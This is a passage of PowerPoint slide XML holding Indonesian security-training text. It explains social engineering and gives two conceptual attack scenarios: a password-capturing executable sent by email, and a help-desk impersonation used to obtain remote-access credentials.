            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>." </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persiapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengilustrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsepnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurutinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-pura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perwakilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjualan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
